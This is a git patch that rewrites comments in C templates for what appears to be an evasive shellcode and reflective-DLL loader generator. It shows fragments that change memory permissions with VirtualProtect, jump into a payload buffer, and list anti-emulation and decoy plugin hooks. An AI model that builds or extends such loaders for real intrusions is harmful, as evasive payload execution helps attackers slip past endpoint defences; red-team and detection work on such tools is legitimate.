From ac0072260b32ed38fc95652165cb12e723ad3b61 Mon Sep 17 00:00:00 2001
From: Dobin Rutishauser <dobin.rutishauser@gmail.com>
Date: Sat, 22 Jun 2024 18:09:02 +0200
Subject: [PATCH] refactor: improve comments

---
 data/source/carrier/alloc_rw_rwx/template.c   |  7 +++---
 data/source/carrier/alloc_rw_rx/template.c    |  3 +--
 data/source/carrier/change_rw_rx/template.c   | 22 +++++--------------
 .../carrier/dll_loader_alloc/template.c       |  5 +++--
 .../carrier/dll_loader_change/template.c      |  5 +++--
 data/source/carrier/peb_walk/template.c       |  4 +++-
 6 files changed, 19 insertions(+), 27 deletions(-)

diff --git a/data/source/carrier/alloc_rw_rwx/template.c b/data/source/carrier/alloc_rw_rwx/template.c
index 8239785..6a4ff0f 100644
--- a/data/source/carrier/alloc_rw_rwx/template.c
+++ b/data/source/carrier/alloc_rw_rwx/template.c
@@ -8,13 +8,14 @@ char *supermega_payload;
 #define p_RX  0x20
 #define p_RWX 0x40
 
-/* iat_reuse
 
-   Standard IAT reuse shellcode
+/* VirtualAlloc -> rw -> rwx
+
    * create new memory region for the payload
-   * will set it to RWX (safe to run shellcodes, opsec-unsafe)
+   * will set it to RWX (opsec-unsafe, allows in-memory decryption with sgn)
 */
 
+
 {{plugin_antiemulation}}
 
 {{plugin_decoy}}
diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c
index 4723cc4..29f343c 100644
--- a/data/source/carrier/alloc_rw_rx/template.c
+++ b/data/source/carrier/alloc_rw_rx/template.c
@@ -16,9 +16,8 @@ char *supermega_payload;
 {{plugin_executionguardrail}}
 
 
-/* iat_reuse_rx
+/* VirtualAlloc -> rw -> rx
 
-   Standard IAT reuse shellcode
    * create new memory region for the payload
    * will set it to RX (may break some shellcodes, opsec-safe)
 */
diff --git a/data/source/carrier/change_rw_rx/template.c b/data/source/carrier/change_rw_rx/template.c
index fb0eb65..99c2544 100644
--- a/data/source/carrier/change_rw_rx/template.c
+++ b/data/source/carrier/change_rw_rx/template.c
@@ -8,11 +8,12 @@ char *supermega_payload;
 #define p_RX  0x20
 #define p_RWX 0x40
 
-/* iat_reuse_rwx_rx
+/* change payload memory regions permissions
+   will reuse IMAGE locations
 
-   IAT reuse shellcode
-   * reuse payload location (both in .rdata and .text)
-   * does (rw/rx) -> rwx -> rx
+   depending on payload injection:
+   * .text -> rw -> rx
+   * .rdata -> rw -> rx
 */
 
 {{plugin_antiemulation}}
@@ -38,13 +39,6 @@ int main()
 	// Call: Decoy plugin
 	decoy();
 
-    // Note: RWX if carrier and payload are on the same page (or we cant exec copy..)
-    //       can do only RW otherwise?
-    /*for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) {
-        if (VirtualProtect(dest + (n * 4096), 16, p_RWX, &result) == 0) {
-            return 16;
-        }
-    }*/
     if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
         return 16;
     }
@@ -55,12 +49,6 @@ int main()
         return 16;
     }
 
-    /*for(int n=0; n<{{PAYLOAD_LEN}}/4096; n++) {
-        if (VirtualProtect(dest + (n * 4096), 16, p_RX, &result) == 0) {
-            return 16;
-        }
-    }*/
-
     // Execute *dest
     (*(void(*)())(dest))();
 
diff --git a/data/source/carrier/dll_loader_alloc/template.c b/data/source/carrier/dll_loader_alloc/template.c
index f015eec..98523a1 100644
--- a/data/source/carrier/dll_loader_alloc/template.c
+++ b/data/source/carrier/dll_loader_alloc/template.c
@@ -10,8 +10,9 @@ char *supermega_payload;
 
 /* DLL loader
 
-   This code will load a DLL (not a shellcode!) into memory, 
-     resolve its imports, apply relocations, and execute it.
+   This code will load a DLL (not a shellcode!) 
+   into new memory region,
+   resolve its imports, apply relocations, and execute it.
 
    Loader is based on: 
      https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
diff --git a/data/source/carrier/dll_loader_change/template.c b/data/source/carrier/dll_loader_change/template.c
index 2d1382c..59a9c6b 100644
--- a/data/source/carrier/dll_loader_change/template.c
+++ b/data/source/carrier/dll_loader_change/template.c
@@ -10,8 +10,9 @@ char *supermega_payload;
 
 /* DLL loader
 
-   This code will load a DLL (not a shellcode!) into memory, 
-     resolve its imports, apply relocations, and execute it.
+   This code will load a DLL (not a shellcode!) into 
+   existing memory region,
+   resolve its imports, apply relocations, and execute it.
 
    Loader is based on: 
      https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
diff --git a/data/source/carrier/peb_walk/template.c b/data/source/carrier/peb_walk/template.c
index 24be0c6..08e275a 100644
--- a/data/source/carrier/peb_walk/template.c
+++ b/data/source/carrier/peb_walk/template.c
@@ -5,7 +5,9 @@
 char *supermega_payload;
 
 /* peb_walk
-   Standard shellcode which will resolve IAT by itself with a peb_walk
+   Standard shellcode which will resolve IAT by itself with a peb walk
+   no IAT reuse is performed
+   no data reuse is performed
 */
 
 int main()